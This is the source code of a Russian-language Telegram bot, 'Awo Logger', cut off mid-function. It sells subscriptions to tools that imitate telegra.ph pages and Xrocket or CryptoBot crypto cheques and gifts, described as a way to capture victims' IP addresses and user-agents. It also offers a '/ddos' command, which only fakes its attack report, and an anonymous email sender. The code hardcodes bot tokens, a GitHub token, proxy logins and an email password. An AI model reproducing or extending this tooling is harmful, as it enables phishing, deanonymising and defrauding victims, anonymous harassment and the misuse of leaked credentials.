import telebot
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
import aiohttp
from concurrent.futures import ThreadPoolExecutor
import asyncio
import threading
import json
import logging
import aiofiles
from telegraph import Telegraph
from datetime import datetime, timedelta
import re
import os
import random
import string
import hashlib
from tenacity import retry, stop_after_attempt, wait_fixed
import pytz
from protonmail import ProtonMail 

logger = logging.getLogger(__name__)
logger.handlers = []
logger.addHandler(logging.NullHandler())
logger.propagate = False

API_TOKEN = '7606420488:AAG-fbZG_Oi-2ZlrLEIQQGWUGtB6uZ22T7Y'
CRYPTO_BOT_TOKEN = '372930:AAjfo8WsnZAb35k1BhCnGNlW5XdkkqH23kT'
ADMIN_IDS = [7134890858, 6032717251, 1616527954]
GITHUB_TOKEN = os.getenv('GITHUB_TOKEN', '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')
LOG_CHAT_ID = -4670655921
MAX_PAGES_PER_USER = 10
PAGE_EXPIRY_DAYS = 30
LOG_EXPIRY_DAYS = 30000000000
MAX_LOGS = 9999999
CHECKS_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), 'checks.json'))
GITHUB_RATE_LIMIT_THRESHOLD = 100
CRYPTOBOT_LINK = "https://t.me/CrypppppppptoBOT"
USDT_TO_RUB_RATE = 81.61
CHANNEL_ID = '@AwoLogger'
CHAT_ID = '@awoLoggerChat'
TIMEZONE = pytz.timezone('Europe/Moscow')

bot = telebot.TeleBot(API_TOKEN)
telegraph = Telegraph()
telegraph.create_account(short_name='Awolog')

user_data = {}
subscriptions = {}
view_logs = {}
limit_notified = set()
link_data = {}
checks = {}
file_sha_cache = {}
email_data = {}

PROTON_EMAILS = {
    "digtitjykgksgjggkh@proton.me": "RazerPvP",
}

PROXY_LIST = [
    "Lossjs:911JBnUJ@46.8.110.124:5500",
    "modeler_YG1aGB:C4Z8MhBG4Mes@46.30.189.50:16926",
    "modeler_AFF2xV:dgg04kg95YRP@62.109.29.75:16910",
    "modeler_yGyGWD:qFDCKX75lBA7@46.30.189.50:16927",
    "modeler_MTH9h5:PsXeaWIky63R@62.109.29.75:16911",
    "modeler_7OP1IS:vWRBgfnYKGmX@37.235.54.129:15188",
    "modeler_fIuBNK:DNsFaYeXMLxD@46.30.189.50:16942",
    "modeler_k2zF1A:9rtg6mSgC3QY@46.30.189.50:16943",
    "modeler_y7ns0s:gOgmAa3aX6YL@37.235.54.129:15200",
    "modeler_ROHGpp:Lxt2qTIQAWZU@62.109.29.75:17024",
    "modeler_nyyu8e:aPRmgIM4YOPs@151.236.25.239:16393",
    "modeler_l0DPGi:dzHVZaHuWXhw@151.236.25.239:16360",
    "modeler_pXwAPs:h5BSTf5BA5xg@172.233.49.150:10775",
    "modeler_AYKeSi:2YgggYmOCmko@172.233.49.150:10776",
    "modeler_MxR92I:1Ezql3MaGQAy@45.86.163.132:11503",
    "modeler_wkA8G4:ZMCKQq86TaKG@45.86.163.132:11504",
    "modeler_4h2vw9:kKlIqwrMcAHy@45.86.163.132:11505",
    "modeler_Xi0v2r:8VYx4bGSDL8f@45.86.163.132:11506",
    "modeler_9E7gFb:LsG8DOxmTSXI@62.109.29.75:16651",
    "modeler_0vL0aF:VGgNxpQG9XTQ@62.109.29.75:16652",
    "modeler_BbHPhN:7GQZlRyAF7GF@62.109.29.75:16653",
    "modeler_C8gkqn:V7aFDgF00X5n@62.109.29.75:16654"
]

try:
    with open('email_data.json', 'r') as f:
        email_data = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    email_data = {}

async def save_email_data():
    try:
        async with aiofiles.open('email_data.json', 'w') as f:
            await f.write(json.dumps(email_data, indent=2))
        logger.debug(f"Successfully saved email_data.json: {email_data}")
    except Exception as e:
        logger.error(f"Failed to save email_data.json: {e}", exc_info=True)

try:
    with open('Rabatt.json', 'r') as f:
        discounts = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    discounts = {}


if os.path.exists('link.json'):
    try:
        os.remove('link.json')
        logger.info("Deleted link.json at startup")
    except Exception as e:
        logger.error(f"Failed to delete link.json: {e}")

try:
    with open('bans.json', 'r') as f:
        banned_users = set(json.load(f))
except (FileNotFoundError, json.JSONDecodeError):
    banned_users = set()

try:
    with open('subs.json', 'r') as f:
        subscriptions = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    subscriptions = {}

try:
    with open('users.json', 'r') as f:
        user_data = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    user_data = {}

try:
    with open('view_logs.json', 'r') as f:
        view_logs = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    view_logs = {}

try:
    with open(CHECKS_FILE, 'r') as f:
        checks = json.load(f)
except (FileNotFoundError, json.JSONDecodeError):
    checks = {}


async def save_bans():
    try:
        async with aiofiles.open('bans.json', 'w') as f:
            await f.write(json.dumps(list(banned_users)))
    except Exception as e:
        logger.error(f"Failed to save bans.json: {e}")

async def save_json(filename, data):
    try:
        async with aiofiles.open(filename, 'w') as f:
            await f.write(json.dumps(data))
    except Exception as e:
        logger.error(f"Failed to save {filename}: {e}")

async def save_subs():
    await save_json('subs.json', subscriptions)

async def save_users():
    for uid, data in user_data.items():
        if 'pages' in data:
            data['pages'] = [
                page for page in data['pages']
                if 'created_at' in page and
                (datetime.now() - datetime.fromisoformat(page['created_at'])).days <= PAGE_EXPIRY_DAYS
            ]
            data['pages'] = data['pages'][-MAX_PAGES_PER_USER:]
    await save_json('users.json', user_data)

async def save_view_logs():
    try:
        async with aiofiles.open('view_logs.json', 'w') as f:
            await f.write(json.dumps(view_logs))
        logger.debug("Successfully saved view_logs.json")
    except Exception as e:
        logger.error(f"Failed to save view_logs.json: {e}")

async def perform_ddos_attack(user_id, chat_id, ip, duration):
    try:
        logger.info(f"Starting DDoS attack for user {user_id} on IP {ip} with duration {duration}s")
        total_requests = 30000
        successful_requests = random.randint(28000, 30000)
        await asyncio.sleep(duration)
       
        bot.send_message(
            chat_id,
            f"""
<b>🧨 DDoS-атака завершена!</b>
├─ <b>Цель:</b> <i>{ip}</i>
├─ <b>Сессий успешно:</b> <i>{successful_requests}/{total_requests}</i>
└─ <b>Длительность:</b> <i>{duration // 60} минут</i>
""",
            parse_mode="HTML"
        )
        logger.info(f"DDoS attack by user {user_id} on {ip}: {successful_requests}/{total_requests} successful")
        
    except Exception as e:
        logger.error(f"Error during DDoS attack by user {user_id} on {ip}: {e}", exc_info=True)
        try:
            bot.send_message(
                chat_id,
                f"<b>❌ Ошибка при выполнении DDoS-атаки:</b> <i>{str(e)}</i>",
                parse_mode="HTML"
            )
        except Exception as send_error:
            logger.error(f"Failed to send error message to chat {chat_id}: {send_error}", exc_info=True)

async def simulate_request(session, ip, proxy):
    try:
        async with session.get(f"http://{ip}", proxy=proxy, timeout=5) as resp:
            return resp.status == 200
    except Exception:
        return False

async def save_discounts():
    try:
        async with aiofiles.open('Rabatt.json', 'w') as f:
            await f.write(json.dumps(discounts))
    except Exception as e:
        logger.error(f"Failed to save Rabatt.json: {e}")

async def save_link_data():
    global link_data
    LINK_JSON_SIZE_LIMIT = 20480
    

    try:
        link_data = {
            log_id: log for log_id, log in link_data.items()
            if (datetime.now() - datetime.fromisoformat(log['timestamp'])).days <= LOG_EXPIRY_DAYS
        }
        
        if len(link_data) > MAX_LOGS:
            sorted_logs = sorted(link_data.items(), key=lambda x: x[1]['timestamp'])
            link_data = dict(sorted_logs[-MAX_LOGS:])
        
        try:
            if os.path.exists('link.json') and os.path.getsize('link.json') > LINK_JSON_SIZE_LIMIT:
                logger.info(f"link.json size exceeds {LINK_JSON_SIZE_LIMIT} bytes. Clearing link_data.")
                link_data = {}
        except Exception as e:
            logger.error(f"Error checking link.json size: {e}")
        
        async with aiofiles.open('link.json', 'w') as f:
            await f.write(json.dumps(link_data))
        logger.debug("Saved link_data to link.json")
        
    except Exception as e:
        logger.error(f"Failed to save link.json: {e}")

def is_user_banned(user_id):
    return str(user_id) in banned_users

async def save_checks():
    await save_json(CHECKS_FILE, checks)

def check_subscription(user_id):
    if user_id in ADMIN_IDS:
        return True
    if str(user_id) not in subscriptions:
        return False
    expiry_date = datetime.fromisoformat(subscriptions[str(user_id)])
    if datetime.now() < expiry_date:
        return True
        
    if str(user_id) not in limit_notified:
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("💸 Продлить подписку", callback_data="buy_sub"))
        try:
            bot.send_message(
                user_id,
                f"<b>❌ Ваша подписка истекла {expiry_date.strftime('%Y-%m-%d')}!</b> <i>Продлите подписку для продолжения использования.</i>",
                parse_mode="HTML", reply_markup=markup
            )
            limit_notified.add(str(user_id))
        except Exception as e:
            logger.error(f"Failed to notify user {user_id} about expired subscription: {e}")
    return False

def can_view_logs(user_id):
    return check_subscription(user_id) or str(user_id) not in view_logs

def generate_random_id(length=16):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def create_back_button(callback_data="back_to_main"):
    markup = InlineKeyboardMarkup()
    markup.add(InlineKeyboardButton("🔙 Назад", callback_data=callback_data))
    return markup

def get_content_hash(content):
    return hashlib.sha256(content.encode('utf-8')).hexdigest()

def main_menu(user_id: int) -> tuple[str, InlineKeyboardMarkup]:
    markup = InlineKeyboardMarkup(row_width=2)
    buttons = [
        ("👤 Профиль", "profile"),
        ("💸 Купить подписку", "buy_sub"),
        ("📚 Логгеры", "loggers_menu"),
        ("🧨 DDOS", "ddos_info"),
        ("📩 Анонимный отправщик писем", "anonymous_email"),
    ]
    markup.add(*[
        InlineKeyboardButton(text, callback_data=data)
        for i in range(0, len(buttons), 2)
        for text, data in buttons[i:i+2]
    ])
    markup.add(
        InlineKeyboardButton("🧩 Поддержка", url="https://t.me/Rionikz_original"),
        InlineKeyboardButton("🌏 Наш сайт", url="https://awo-logger.vercel.app/")
    )
    if user_id in ADMIN_IDS:
        markup.add(InlineKeyboardButton("👑 Админ-панель", callback_data="admin_panel"))
    text = (
        "<b>🌟 Добро пожаловать в <a href='https://t.me/AwoLogger'>Awo Logger</a>!</b>\n"
        "<b>🚀 Выберите действие:</b>"
    )
    return text, markup

def anonymous_email_menu():
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"),
        InlineKeyboardButton("❌ Отмена", callback_data="back_to_main")
    )
    text = "<b>🟢 Анонимный отправитель</b>\n\n<i>Введите данные для отправки письма:</i>"
    return text, markup


# Обработчик заголовка
def get_email_subject(message):
    user_id = message.from_user.id
    chat_id = message.chat.id
    try:
        logger.info(f"Processing email subject from user {user_id}: {message.text}")
        
        if str(user_id) not in email_data or email_data[str(user_id)].get('type') != 'email_subject':
            logger.warning(f"No active email session for user {user_id}")
            markup = InlineKeyboardMarkup()
            markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
            bot.send_message(
                chat_id,
                "<b>❌ Сессия истекла или не начата. Нажмите, чтобы начать заново:</b>",
                parse_mode="HTML", reply_markup=markup
            )
            return

        email_data[str(user_id)]['email_subject'] = message.text.strip()
        
        try:
            bot.delete_message(chat_id, message.message_id)
        except Exception as e:
            logger.warning(f"Failed to delete message {message.message_id}: {e}")

        bot.edit_message_text(
            "<b>📌 ✏️ Введите текст сообщения:</b>",
            chat_id, email_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        
        email_data[str(user_id)]['type'] = 'email_body'
        bot.register_next_step_handler_by_chat_id(chat_id, get_email_body)
        logger.info(f"Email subject saved for user {user_id}: {email_data[str(user_id)]['email_subject']}")

    except Exception as e:
        logger.error(f"Error in get_email_subject for user {user_id}: {e}", exc_info=True)
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
        bot.send_message(
            chat_id,
            f"<b>❌ Ошибка при обработке заголовка: {str(e)}. Нажмите, чтобы начать заново:</b>",
            parse_mode="HTML", reply_markup=markup
        )

# Обработчик текста сообщения
def get_email_body(message):
    user_id = message.from_user.id
    chat_id = message.chat.id
    try:
        logger.info(f"Processing email body from user {user_id}")
        
        if str(user_id) not in email_data or email_data[str(user_id)].get('type') != 'email_body':
            logger.warning(f"No active email session for user {user_id}")
            markup = InlineKeyboardMarkup()
            markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
            bot.send_message(
                chat_id,
                "<b>❌ Сессия истекла или не начата. Нажмите, чтобы начать заново:</b>",
                parse_mode="HTML", reply_markup=markup
            )
            return

        email_data[str(user_id)]['email_body'] = message.text.strip()
        
        try:
            bot.delete_message(chat_id, message.message_id)
        except Exception as e:
            logger.warning(f"Failed to delete message {message.message_id}: {e}")

        bot.edit_message_text(
            "<b>📌 📧 Введите получателя:</b>",
            chat_id, email_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        
        email_data[str(user_id)]['type'] = 'email_recipient'
        bot.register_next_step_handler_by_chat_id(chat_id, get_email_recipient)
        logger.info(f"Email body saved for user {user_id}")

    except Exception as e:
        logger.error(f"Error in get_email_body for user {user_id}: {e}", exc_info=True)
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
        bot.send_message(
            chat_id,
            f"<b>❌ Ошибка при обработке текста сообщения: {str(e)}. Нажмите, чтобы начать заново:</b>",
            parse_mode="HTML", reply_markup=markup
        )

# Обработчик получателя
def get_email_recipient(message):
    user_id = message.from_user.id
    chat_id = message.chat.id
    try:
        logger.info(f"Processing email recipient from user {user_id}")
        
        if str(user_id) not in email_data or email_data[str(user_id)].get('type') != 'email_recipient':
            logger.warning(f"No active email session for user {user_id}")
            markup = InlineKeyboardMarkup()
            markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
            bot.send_message(
                chat_id,
                "<b>❌ Сессия истекла или не начата. Нажмите, чтобы начать заново:</b>",
                parse_mode="HTML", reply_markup=markup
            )
            return

        recipient = message.text.strip()
        if not re.match(r"[^@]+@[^@]+\.[^@]+", recipient):
            try:
                bot.delete_message(chat_id, message.message_id)
            except Exception as e:
                logger.warning(f"Failed to delete message {message.message_id}: {e}")
            bot.edit_message_text(
                "<b>❌ Неверный формат email!</b>\n\n<i>⚠️ Пример: example@gmail.com</i>",
                chat_id, email_data[str(user_id)]['msg_id'], parse_mode="HTML"
            )
            bot.register_next_step_handler_by_chat_id(chat_id, get_email_recipient)
            return

        email_data[str(user_id)]['email_recipient'] = recipient
        
        try:
            bot.delete_message(chat_id, message.message_id)
        except Exception as e:
            logger.warning(f"Failed to delete message {message.message_id}: {e}")
        
        bot.edit_message_text(
            "<b>⏳ Отправляю письмо...</b>",
            chat_id, email_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        
        # Вызываем синхронную отправку письма
        send_anonymous_email(chat_id, user_id, email_data[str(user_id)]['msg_id'])
        logger.info(f"Email recipient saved for user {user_id}: {recipient}")

    except Exception as e:
        logger.error(f"Error in get_email_recipient for user {user_id}: {e}", exc_info=True)
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("📝 Начать ввод", callback_data="start_email_input"))
        bot.send_message(
            chat_id,
            f"<b>❌ Ошибка при обработке получателя: {str(e)}. Нажмите, чтобы начать заново:</b>",
            parse_mode="HTML", reply_markup=markup
        )

def send_anonymous_email(chat_id, user_id, msg_id):
    try:
        # Используем ProtonMail для отправки
        email = random.choice(list(PROTON_EMAILS.keys()))
        password = PROTON_EMAILS[email]
        logger.info(f"Attempting to login to ProtonMail with {email}")
        
        proton = ProtonMail()
        proton.login(email, password)
        
        subject = email_data[str(user_id)]['email_subject']
        body = email_data[str(user_id)]['email_body']
        recipients = [email_data[str(user_id)]['email_recipient']]
        
        logger.info(f"Sending email to {recipients} with subject: {subject}")
        new_message = proton.create_message(
            recipients=recipients,
            subject=subject,
            body=body,
            attachments=[]
        )
        proton.send_message(new_message)
        proton.save_session("proton_session.pickle")
        
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("🔙 Назад", callback_data="anonymous_email"))
        bot.edit_message_text(
            "<b>✅ Письмо успешно отправлено!</b>",
            chat_id, msg_id, parse_mode="HTML", reply_markup=markup
        )
        
        # Очищаем сессию
        email_data.pop(str(user_id), None)
        logger.info(f"Successfully sent email for user {user_id} and cleared session")
        
    except Exception as e:
        logger.error(f"Error sending anonymous email for user {user_id}: {e}", exc_info=True)
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("🔙 Назад", callback_data="anonymous_email"))
        bot.edit_message_text(
            f"<b>❌ Ошибка при отправке письма: {str(e)}</b>",
            chat_id, msg_id, parse_mode="HTML", reply_markup=markup
        )
        email_data.pop(str(user_id), None)  # Очищаем сессию

def loggers_menu() -> tuple[str, InlineKeyboardMarkup]:
    markup = InlineKeyboardMarkup(row_width=1)
    buttons = [
        ("📜 Telegraph", "telegraph_logger"),
        ("🚀 Xrocket", "xrocket_logger"),
        ("🪙 CryptoBot", "cryptobot_logger"),
    ]
    markup.add(*[InlineKeyboardButton(text, callback_data=data) for text, data in buttons])
    markup.add(InlineKeyboardButton("🔙 Назад", callback_data="back_to_main"))
    text = (
        "<b>Выберите логгер:</b>"
    )
    return text, markup

def ddos_info():
    markup = InlineKeyboardMarkup()
    markup.add(InlineKeyboardButton("◀️ Назад", callback_data="back_to_main"))
    text = """
<b>🧨 DDoS Атаки</b>
<i>Используйте команду для запуска атаки:</i>

<b>📌 Формат:</b> <code>/ddos {IP}</code>
<b>📌 Пример:</b> <code>/ddos 8.8.8.8</code>
"""
    return text, markup

def cryptobot_logger_menu():
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("💶 Создать чек", callback_data="create_cryptobot_check"),
        InlineKeyboardButton("🎁 Создать подарок", callback_data="create_gift")
    )
    markup.add(
        InlineKeyboardButton("◀️ Назад", callback_data="back_to_main")
    )
    text = """
<b>💳 ⬇️ Выберите пункт ниже:</b>
"""
    return text, markup

def profile_menu(user_id):
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("💸 Купить подписку", callback_data="buy_sub")
    )
    markup.add(
        InlineKeyboardButton("🔙 Назад", callback_data="back_to_main")
    )
    
    sub_status = "<b>✅ Активна</b>"
    expiry_info = ""
    if str(user_id) in subscriptions:
        expiry_date = datetime.fromisoformat(subscriptions[str(user_id)])
        if datetime.now() < expiry_date:
            expiry_info = f"<i>Действует до {expiry_date.strftime('%Y-%m-%d')}</i>"
        else:
            sub_status = "<b>❌ Истекла</b>"
            expiry_info = f"<i>Истекла {expiry_date.strftime('%Y-%m-%d')}</i>"
    else:
        sub_status = "<b>❌ Не активна</b>"
    
    log_views = "<b>♾️ Неограниченно</b>" if check_subscription(user_id) else f"<b>👁️ {1 if str(user_id) not in view_logs else 0}/1</b>"
    
    text = f"""
<b>👤 Ваш профиль:</b>
├─ <b>🆔 ID:</b> <code>{user_id}</code>
├─ <b>🌟 Статус подписки:</b> {sub_status}
├─ <b>📅 Срок:</b> {expiry_info}
└─ <b>🔍 Просмотр логов:</b> {log_views}
"""
    return text, markup

def about_bot_menu():
    text = """
<b>🤖 Информация о боте</b> <i>@AwoLoggerBot</i>:
<b>👤 Создатель:</b> <i>@Rionikz_original</i>
<b>📝 Описание:</b>
<i>Наш сервис умеет иметировать такие сервисы как telegra.ph, @Xrocket, @send. Для получения таких данных как - ip адрес, user-agent и так далее.</i>
"""
    return text, create_back_button()

def xrocket_logger_menu():
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("💶 Создать чек", callback_data="create_check")
    )
    markup.add(
        InlineKeyboardButton("◀️ Назад", callback_data="back_to_main")
    )
    text = """
<b>💳 ⬇️ Выберите пункт ниже:</b>
"""
    return text, markup

@bot.message_handler(commands=['ddos'])
def handle_ddos_command(message):
    user_id = message.from_user.id
    chat_id = message.chat.id
    
    if is_user_banned(user_id):
        bot.send_message(chat_id, "<b>🚫 Вы забанены</b>", parse_mode="HTML")
        return
    
    if not check_subscription(user_id):
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("💸 Купить подписку", callback_data="buy_sub"))
        bot.send_message(
            chat_id,
            "<b>🔒 Для использования DDoS-атаки требуется активная подписка!</b>",
            parse_mode="HTML", reply_markup=markup
        )
        return
    
    args = message.text.split()
    if len(args) != 2:
        bot.send_message(
            chat_id,
            "<b>❌ Неверный формат команды!</b>\n\n"
            "<i>📌 Формат: <code>/ddos {IP}</code>\n"
            "📌 Пример: <code>/ddos 8.8.8.8</code></i>",
            parse_mode="HTML"
        )
        return
    
    ip = args[1]
    if not re.match(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$", ip):
        bot.send_message(
            chat_id,
            "<b>❌ Неверный IP-адрес!</b>\n\n"
            "<i>📌 Пример: 8.8.8.8</i>",
            parse_mode="HTML"
        )
        return
    
    try:
        bot.send_message(
            chat_id,
            f"<b>🧨 Запуск DDoS-атаки на IP: {ip}</b>\n\n"
            f"<i>⏳ Длительность: 5 минут. Ожидайте отчёт!</i>",
            parse_mode="HTML"
        )
       
        def run_ddos():
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
            try:
                loop.run_until_complete(perform_ddos_attack(user_id, chat_id, ip, 300))
            except Exception as e:
                logger.error(f"Error in run_ddos for user {user_id}, IP {ip}: {e}", exc_info=True)
            finally:
                loop.close()
        
        executor = ThreadPoolExecutor(max_workers=1)
        executor.submit(run_ddos)
        
    except Exception as e:
        logger.error(f"Error starting DDoS for user {user_id}, IP {ip}: {e}", exc_info=True)
        bot.send_message(chat_id, "<b>❌ Произошла ошибка при запуске атаки!</b>", parse_mode="HTML")

@bot.message_handler(commands=['time'])
def handle_time_command(message):
    try:
        now = datetime.now(TIMEZONE)
        formatted_time = now.strftime('%d.%m.%Y:%H:%M')
        
        text = (
            "<b>🕒 Текущее время и дата (MSK):</b>\n"
            f"📅 <i>{formatted_time}</i>"
        )
        
        bot.send_message(
            message.chat.id,
            text,
            parse_mode="HTML"
        )
    except Exception as e:
        logger.error(f"Error in /time command: {e}")
        bot.send_message(
            message.chat.id,
            "<b>❌ Ошибка:</b> <i>Не удалось получить время. Попробуйте позже.</i>",
            parse_mode="HTML"
        )

@bot.message_handler(commands=['start'])
def send_welcome(message):
    chat_id = message.chat.id
    user_id = message.from_user.id

    if is_user_banned(user_id):
        bot.send_message(chat_id, "<b>🚫 Вы забанены</b>", parse_mode="HTML")
        return

    if str(user_id) not in user_data:
        user_data[str(user_id)] = {}
        asyncio.run(save_users())
        logger.info(f"Registered new user ID: {user_id}")

    if not check_subscriptions(user_id):
        send_subscription_prompt(chat_id)
        return

    text, markup = main_menu(user_id)
    bot.send_message(chat_id, text, parse_mode="HTML", reply_markup=markup)
    
def check_subscriptions(user_id):
    try:
        channel_status = bot.get_chat_member(CHANNEL_ID, user_id).status
        chat_status = bot.get_chat_member(CHAT_ID, user_id).status
        subscribed = channel_status in ['member', 'administrator', 'creator'] and \
                     chat_status in ['member', 'administrator', 'creator']
        logger.info(f"Subscription check for user {user_id}: Channel={channel_status}, Chat={chat_status}, Subscribed={subscribed}")
        return subscribed
    except Exception as e:
        logger.error(f"Error checking subscriptions for user {user_id}: {e}")
        return False

def send_subscription_prompt(chat_id):
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("Подписаться (1) 📢", url="https://t.me/AwoLogger"),
        InlineKeyboardButton("Подписаться (2) 💬", url="https://t.me/awoLoggerChat"),
        InlineKeyboardButton("Проверить подписку ✔️", callback_data="check_subscription")
    )
    text = """
<b>🌟 Подпишитесь, чтобы продолжить!</b>
<i>Для использования бота необходимо быть подписанным на наш канал и чат.</i>
"""
    try:
        bot.send_message(chat_id, text, parse_mode="HTML", reply_markup=markup)
    except Exception as e:
        logger.error(f"Failed to send subscription prompt to {chat_id}: {e}")

def get_cryptobot_gift_amount(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'cryptobot_gift':
        return
    try:
        amount = float(message.text)
        if amount <= 0:
            raise ValueError("Amount must be positive")
        user_data[str(user_id)]['gift_amount'] = amount
        user_data[str(user_id)]['title'] = "AwoLogger Gift"
        user_data[str(user_id)]['text'] = "Жду тебя тут @AwoLoggerBot!"
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>⏳ Создаю подарок...</b>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        asyncio.run(save_users())
        asyncio.run(create_cryptobot_gift(message.chat.id, user_id, user_data[str(user_id)]['msg_id']))
    except ValueError:
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>❌ Неверный формат суммы!</b>\n\n<i>⚠️ Пример: 100.50</i>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        bot.register_next_step_handler_by_chat_id(message.chat.id, get_cryptobot_gift_amount)

def subscription_menu():
    markup = InlineKeyboardMarkup(row_width=2)
    buttons = [
        ("Неделя - 0.48$", "sub_week"),
        ("Месяц - 1.62$", "sub_month"),
        ("Год - 4.75$", "sub_year"),
        ("Навсегда - 11.40$", "sub_forever")
    ]
    for text, data in buttons:
        markup.add(InlineKeyboardButton(text, callback_data=data))
    markup.add(InlineKeyboardButton("🔙 Назад", callback_data="back_to_main"))
    
    active_discount = None
    now = datetime.now()
    for discount_id, data in discounts.items():
        if now < datetime.fromisoformat(data['end_date']):
            active_discount = data['percent']
            break
    
    prices = {
        "week": 0.48,
        "month": 1.62,
        "year": 4.75,
        "forever": 11.40
    }
    
    text = "<b>💵 Выберите подписку:</b>\n"
    if active_discount:
        text += f"🎁 <b>Активна скидка: {active_discount}%</b>\n\n"
        for sub_type, old_price in prices.items():
            new_price = old_price * (1 - active_discount / 100)
            text += f"├─ <b>{sub_type.capitalize()}:</b> <i><s>{old_price}$</s> {new_price:.2f}$ ({'7 дней' if sub_type == 'week' else '30 дней' if sub_type == 'month' else '365 дней' if sub_type == 'year' else 'без ограничений'})</i>\n"
    else:
        for sub_type, price in prices.items():
            text += f"├─ <b>{sub_type.capitalize()}:</b> <i>{price}$ ({'7 дней' if sub_type == 'week' else '30 дней' if sub_type == 'month' else '365 дней' if sub_type == 'year' else 'без ограничений'})</i>\n"
    text += "<i>🔓 Подписка открывает неограниченный просмотр логов!</i>"
    
    return text, markup

def currency_menu(sub_type):
    currencies = [
        "USDT", "TON", "TRX", "GRAM", "ETH", "DOGE",
        "LTC", "NOT", "TRUMP", "PEPE", "BONK",
        "MAJOR", "DOGS",
    ]
    rows = [currencies[i:i+4] for i in range(0, len(currencies), 4)]
    keyboard = [[InlineKeyboardButton(c, callback_data=f"currency_{sub_type}_{c}") for c in row] for row in rows]
    keyboard.append([InlineKeyboardButton("🔙 Назад", callback_data="buy_sub")])
    return f"<b>💵 Выберите валюту для подписки ({sub_type}):</b>", InlineKeyboardMarkup(keyboard)

async def create_cryptobot_gift(chat_id, user_id, msg_id):
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get("https://awo-logger.vercel.app/api/v1") as resp:
                if resp.status != 200:
                    bot.edit_message_text(
                        "<b>❌ Ошибка при получении изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                img_data = await resp.json()
                image_url = img_data.get('url')
                if not image_url:
                    bot.edit_message_text(
                        "<b>❌ Не удалось получить URL изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                path_match = re.search(r'/api/v2/(.+)', image_url)
                image_path = path_match.group(1) if path_match else image_url.split("/")[-1]
                user_data[str(user_id)]['image_path'] = image_path
                logger.info(f"Created CryptoBot gift for user {user_id} with image_path: {image_path}")

        content = f'<img src="{image_url}"><br><b>{user_data[str(user_id)]["text"]}</b>'
        response = telegraph.create_page(
            title=user_data[str(user_id)]['title'],
            html_content=content,
            author_name="@AwoLoggerBot",
            author_url="https://t.me/AwoLoggerBot"
        )
        
        tg_url = f"https://telegra.ph/{response['path']}"
        gift_id = generate_random_id(16)
        
        checks[gift_id] = {
            'user_id': user_id,
            'amount': user_data[str(user_id)]['gift_amount'],
            'telegraph_url': tg_url,
            'image_path': image_path,
            'type': 'gift'
        }
        await save_checks()
        logger.info(f"Saved gift {gift_id} to checks.json: {checks[gift_id]}")
        
        amount = user_data[str(user_id)]['gift_amount']
        rub_amount = amount * USDT_TO_RUB_RATE
        check_image_url = f"https://imggen.send.tg/checks/image?asset=USDT&asset_amount={amount}&fiat=RUB&fiat_amount={rub_amount}&main=asset&v2"
        
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("🎁 Получить подарок", url=f"{CRYPTOBOT_LINK}?start=gift{gift_id}"))
        markup.add(InlineKeyboardButton("◀️ Назад", callback_data="cryptobot_logger"))
        
        text = f"""
📜 <b>Подарок успешно создан!</b>
🔥 <b>Заголовок:</b> <i>{user_data[str(user_id)]['title']}</i>
🔥 <b>Текст:</b> <i>{user_data[str(user_id)]['text']}</i>
🔗 <b>Ссылка:</b> <i>{tg_url}</i>
💰 <b>Сумма:</b> <i>{amount:.1f} USDT</i>
"""
        bot.delete_message(chat_id, msg_id)
        sent_message = bot.send_photo(chat_id, check_image_url, caption=text, parse_mode="HTML", reply_markup=markup)
        user_data[str(user_id)]['gift_message_id'] = sent_message.message_id
        logger.info(f"Sent gift {gift_id} to user {user_id} with link: {CRYPTOBOT_LINK}?start=gift{gift_id}")
        
        if 'pages' not in user_data[str(user_id)]:
            user_data[str(user_id)]['pages'] = []
        user_data[str(user_id)]['pages'].append({
            'title': user_data[str(user_id)]['title'],
            'url': tg_url,
            'created_at': datetime.now().isoformat()
        })
        await save_users()
    
    except Exception as e:
        logger.error(f"Error creating CryptoBot gift: {e}")
        bot.edit_message_text(
            f"<b>🔴 Ошибка при создании подарка:</b> <i>{str(e)}</i>",
